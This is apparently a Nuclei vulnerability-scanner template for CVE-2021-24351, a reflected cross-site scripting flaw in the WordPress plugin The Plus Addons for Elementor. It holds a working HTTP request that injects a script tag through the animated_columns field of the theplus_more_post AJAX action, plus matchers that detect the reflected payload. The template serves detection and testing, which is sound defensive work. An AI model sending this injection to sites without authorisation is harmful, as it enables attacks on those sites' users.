nuclei-templates/http/cves/2021/CVE-2021-24351.yaml

52 lines
1.9 KiB
YAML

id: CVE-2021-24351
info:
name: WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting
author: Maximus Decimus
severity: medium
description: |
WordPress The Plus Addons for Elementor plugin before 4.1.12 is susceptible to cross-site scripting. The plugin does not properly sanitize some of its fields in the heplus_more_post AJAX action, which is exploitable by both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/2ee62f85-7aea-4b7d-8b2d-5d86d9fb8016
- https://theplusaddons.com/changelog/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24351
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24351
cwe-id: CWE-79
cpe: cpe:2.3:a:posimyth:the_plus_addons_for_elementor:*:*:*:*:*:*:*:*
epss-score: 0.00145
tags: cve2021,wordpress,wp-plugin,wp,xss,the-plus-addons-for-elementor,wpscan,cve
metadata:
max-request: 1
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "the-plus-addons-for-elementor"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by md on 2023/04/12